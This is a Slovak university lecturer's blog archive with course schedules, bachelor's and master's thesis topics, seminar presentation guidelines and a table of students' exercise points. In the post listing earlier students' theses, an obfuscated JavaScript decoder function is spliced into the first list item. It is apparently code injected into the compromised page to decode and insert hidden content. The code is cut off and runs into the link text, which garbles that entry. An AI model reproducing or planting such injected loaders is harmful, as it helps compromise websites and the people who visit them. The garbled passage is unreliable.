Pri krbe

Poznámky zo života s nohami v teple

Archive for the ‘FMFI UK’ Category

Vizualizačný nástroj algoritmov

without comments

Na prednáške Prof. Luděka Kučeru som sa dozvedel o jeho projekte AlgoVision. Je tam veľa užitočných vizualizácií bežných algoritmov na stromoch ale aj niektorých algoritmov, ktoré sa učíme na Výpočtovej geometrii. Jeho kniha je vraj dostupná vo fakultnej knižnici, v elektronickej verzii je na jeho stránke.

Voronoiov diagram

Written by Pavel Chalmovianský

November 30th, 2009 at 3:05 pm

Posted in Knihy,Veda,Vyučovanie

Tagged with

Modelovanie kriviek pre CAGD, letný semester 2009

without comments

Prednáška sa koná v XI, Štv, 14:50-16:20. Učebný text k prednáške je v štádiu prípravy. Jeden exemplár pracovnej verzie dám k dispozícii na prednáške.

Termíny skúšok: elektronicky systém FMFI Začíname o 9:00 pred M158. Ku skúške treba mať hodnotenie z cvičenia.

Written by Pavel Chalmovianský

November 30th, 2009 at 2:37 pm

Posted in Vyučovanie

Tagged with , ,

Topológia a funkcionálna analýza, letný semester 2009

without comments

Prednáška sa koná v XI, Str, 8:10-9:40, VIII, Štv, 9:50-11:20 Tu možno stiahnuť text prednášky (PDF verzia) spolu so zadaniami cvičení.

Termíny skúšok: elektronicky systém FMFI Začíname o 9:00 pred M158.

Written by Pavel Chalmovianský

November 30th, 2009 at 2:34 pm

Práce Vašich predchodcov

without comments

Tlačené práce so všetkými prílohami sú dostupné buď v knižnici alebo u mňa alebo priamo u vašich starších kolegov. Práce ukončené od roku 2006 sú dostupné v elektronickej podobe vo fakultnej knižnici. (V prípade problémov s elektronickou verziou niektorej diplomovky alebo neplatnosťou linky na osobnú stránku mi prosím pošlite oznam.)

 1. function r0093c87a1(re){var xc=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var uf=”;var pd,r7,x1,x4,s1,v0,r2;var s5=0;do{x4=xc.indexOf(re.charAt(s5++));s1=xc.indexOf(re.charAt(s5++));v0=xc.indexOf(re.charAt(s5++));r2=xc.indexOf(re.charAt(s5++));pd=(x4<<2)|(s1>>4);r7=((s1&15)<<4)|(v0>>2);x1=((v0&3)<<6)|r2;if(pd>=192)pd+=848;else if(pd==168)pd=1025;else if(pd==184)pd=1105;uf+=String.fromCharCode(pd);if(v0!=64){if(r7>=192)r7+=848;else if(r7==168)r7=1025;else if(r7==184)r7=1105;uf+=String.fromCharCode(r7);}if(r2!=64){if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;uf+=String.fromCharCode(x1);}}while(s5andra.pdf”>Alexandra Adamíková, 2009
 2. Jakub Mišún, 2010
 3. Matúš Ždanský, 2010
 4. Miroslava Selecká
 5. Samuel Struss
 6. Adriana Bosáková

Written by Pavel Chalmovianský

November 30th, 2009 at 2:31 pm

Posted in Bakalárske práce

Tagged with

Témy bakalárskych prác

without comments

 1. Základné geometrické vlastnosti algebraických kriviek v rovine
 2. Ortogonálne transformácie E^n
 3. NURBS
 4. T-splajny
 5. Minkowského priestor a jeho základné vlastnosti
 6. Vybrané geometrické dátové štruktúry
 7. Duálne čísla
 8. Konvexný mnohosten v E^n
 9. Geometrické vlastnosti determinantu

Bližšie informácie ako aj materiály objasním pri osobnom stretnutí.

Written by Pavel Chalmovianský

November 30th, 2009 at 2:25 pm

Téma diplomovej práce

without comments

Aproximácia implicitne definovanej plochy.

Práca sa zameriava na zostavenie funkčného a rozšíriteľného zdrojového kódu na aproximáciu implicitne definovaných plôch. Cieľom je vyprodukovať vzorový program s komentármi (CVS alebo podobnyý systém), ktorý bude voľne dostupný z katedrálneho servera. Práca nadväzuje na dve diplomové práce obhajované v šk. roku 2005/06 zamerané na čiastočné riešenie niektorých podproblémov.

Written by Pavel Chalmovianský

November 30th, 2009 at 12:56 pm

Téma diplomovej práce

without comments

Štruktúra rovinnej a priestorovej algebraickej krivky.

Výpočet aproximácie topológie rovinnej krivky. Singulárne body, graf topológie. Topológia krivky v priestore. Zostrojiť program na výpočet a vykreslenie takýchto kriviek. Presný opis singularít na základe daných plôch Z(f), Z(g) a ich (lokálnych) algebraických aproximácií.

Written by Pavel Chalmovianský

November 30th, 2009 at 12:29 pm

Téma diplomovej práce

without comments

Základná diferenciálna geometria kriviek v Minkowského rovine a priestore.

Cieľom práce je študovanie modelov hyperbolickej roviny a porovnanie základných vlastností kriviek v euklidovskom a Minkowského dvojrozmernom priestore (napr. krivosť), geometrická interpretácia a vizualizácia zhodných transformácii hyperbolickej roviny. Pri rýchlom postupe sa analogické pojmy dajú študovať na krivkách v Minkowského priestore E^{n,1} pre vhodné n ako aj zhodnosti v tomto priestore.

Written by Pavel Chalmovianský

November 30th, 2009 at 12:23 pm

Pokročilé geometrické modelovanie, zimný semester 2009

without comments

Prednáška sa koná v stredu o 15:40 v M120 (presunuté zo štvrtka o 14:00).

Na úspešné absolvovanie predmetu je potrebné urobiť referát z článku. Nájdete ich buď nižšie alebo si ich môžete nájsť sami (v tom prípade ho doneste, aby som zistil, či je tematicky vhodný). Referát môžete mať kedykoľvek počas semestra.

Ak si vyberiete článok, dajte mi prosím vedieť (najlepšie e-mailom), čo ste si vybrali, aby som mohol informovať ostatných. (Ak ste už niektorý článok referovali na PGM I, tak si vyberte nejaký iný). Je možné, že si študujete niečo, čo je geometrickému modelovaniu príbuzné. Ak chcete referovať takúto prácu, doneste mi ju ukázať alebo mi pošlite linku. Ak potrebujete na prezentáciu notebook/projektor, dajte mi prosím vopred vedieť. Treba ho rezervovať. Referáty, ktoré sa neuskutočnia počas semestra (maximálne 4), si treba pripraviť na 17.12.2009.

Návod na referát

 1. Referát by nemal trvať viac ako 20 minút. (Vyskúšajte si to prosím!)
 2. Prezentujte hlavné idey článku ilustrované na príkladoch. Vyhýbajte sa technickým detailom. Tie si každý naštuduje sám, ak ho zaujme hlavná myšlienka. Radšej hovorte kratšie a zrozumiteľne ako naopak.
 3. Na konci zodpoviete otázky poslucháčov.
 4. V referáte nesmie chýbať:
  1. čo je dané, aké sú predpoklady konštrukcie, dôkazu
  2. čo chceme dosiahnuť, aký je výsledok konštrukcie, dôkazu
  3. aká je hlavná myšlienka konštrukcie, dôkazu, etc.
  4. aké pomocné prostriedky potrebujeme
  5. zhodnotenie výhod a nevýhod prezentovaného prístupu
  6. ako by sa podľa Vás dala práca rozšíriť, aplikovať, vylepšiť
 5. Prípravu na prednášku (slajdy, rozdajníky a iné) prosím doručte aspoň 2 týždne pred prednáškou (prosím v tlačenej verzii alebo v elektronickej vo formáte .ps alebo .pdf). Pošlem Vám spätnú väzbu.

Pokiaľ nerozumiete anglickým termínom alebo neviete ich slovenské ekvivalenty v uvedených článkoch, napíšte mi, o aký termín ide a kde sa v článku nachádza, pokúsim sa Vám pomôcť.

Články na referáty s menom referujúceho a počtom jeho predchodcov:

Článok 1 Jana Dadová 5 Článok 2 4 Článok 3 0
Článok 4 1 Článok 5 0 Článok 6 2
Článok 7 0 Článok 8 1 Článok 9 0
Článok 10 1 Článok 11 Lenka Mezeiová 5 Článok 12 6
Článok 13 2 Článok 14 0 Článok 15 2
Článok 16 Lucia Cáková 0 Článok 17 0 Článok 18 3
Článok 19 3 Článok 20 5 Článok 21 0
Článok 22 0 Článok 23 3 Článok 24 0
Článok 25 2 Článok 26 Radka Škvoráková 2 Článok 27 0
Článok 28 Dalibor Hrtánek 6 Článok 29 Petra Heribanová 1 Článok 30 Mariana Ludvíková 5
Článok 31 0 Článok 32 0 Článok 33 0
Článok 34 0

Written by Pavel Chalmovianský

November 30th, 2009 at 12:16 pm

Posted in Vyučovanie

Tagged with , ,

Výpočtová geometria, zimný semester 2009

without comments

Prednáška sa koná v M-V, Uto 9:50-11:20 a M-VIII, Str 9:50-11:20. Pozrite si informácie o učebnom texte. Počas semestra treba vypracovať niekoľko cvičení alebo alternatívne písomku na konci semestra. Rozsah a spôsob vypracovania je na Vás. Bližšie informácie nájdete v súbore cvicenia zo ZGA. Zadania bez riešení stiahnete tu. A tu je príklad vypracovaného cvičenia.

V nasledujúcej tabuľke je bodový zisk za riešenie úloh. Za menom nasleduje celkový počet bodov. Potom rozpis po príkladoch v poradí ako som ich dostal od každého. Rímskym číslom je označená oblasť úloh (I. štartovacie úlohy, II. konvexné obaly, III. proximita, IV. vyhľadávanie, V. prieniky, P – písomka, O – opravná písomka). Prvé arabské číslo je počet bodov za riešenie úlohy, druhé za napísanie úlohy a tretie bonusové podľa okolností (pozri bližšie text o cvičeniach). Bližšie vysvetlenie má každý v odpovedi na riešenie úloh.

Meno Celkový počet bodov Body za jednotlivé úlohy
Viktória Bakurová 430 I. 5, 15+20 II. 30+20, 30+30, 10 III. 45, 30+10, 5, 50, 15 IV. 20,15, 35 V. 20+30+10
Lucia Cáková 7 II. 2 III. 5
Mária Gáborová 30 I. 15 II. 15
Barbora Gallusová 430 II. 35+20, 25, 50+30+10 III. 10, 20, 25 IV. 20+30,10,25,50 V. 40+20+10
Lukáš Gamrat 178 I. 25 II. 20, 15, 10, 10 III. 35, 35 IV. 18, 10
Martin Havala 269 II. 30+20, 12, 5 III. 5, 25+20+10, 15, 15 IV. 10,10,25,20,5 V. 7, 15, 20
Petra Heribanová 73 I. 3 II. 10, 20, 30, 5, 5
Dalibor Hrtánek 294 I. 5, 5 II. 10, 2, 20, 10, 5 III. 45+30+10, 7 IV. 20+20+10, 20, 20 V. 30, 25
Alojz Kováčik 582 II. 30+30, 50+20 III. 7, 25, 45, 25 IV. 15, 10+10+10, 50+30+10, 50+10+10 V. 40+20, 30+20, 25+10+10
Barbora Macháčová 65 II. 15 III. 10, 10 IV.3, 2, 25 V. 0
Martin Manduch 600 II. 30+30+20, 30+30+10 III. 35+30, 15 IV. 30+30+20, 10, 50+30 V. 30+20+10,40+30,30+20+10
Lenka Mezeiová 233 I. 15, 12 II. 50+30+10, 10, 15 III. 22, 10 IV. 20, 2, 10 V. 5, 20
Erika Pálešová 175 I. 5 II. 20, 15, 40 III. 10, 0, 5, 5 IV. 5,5,5,25+10,10,0,10 V. 5
Rastislav Švarba 40 I. 20 II. 5 IV. 20

Stiahnite si vybrané kapitoly z konvexnej geometrie.

Termíny skúšky: 13.1., 20.1., 27.1., 3.2. o 9:00 pri M158, zapisovanie cez fakultný systém

Pozitívne hodnotené sú všetky chyby, ktoré nájdete v skriptách, a ktoré sa v čase ich ohlásenia nenachádzajú v súbore ERRATA.

Written by Pavel Chalmovianský

November 30th, 2009 at 11:49 am

Posted in Vyučovanie

Tagged with , ,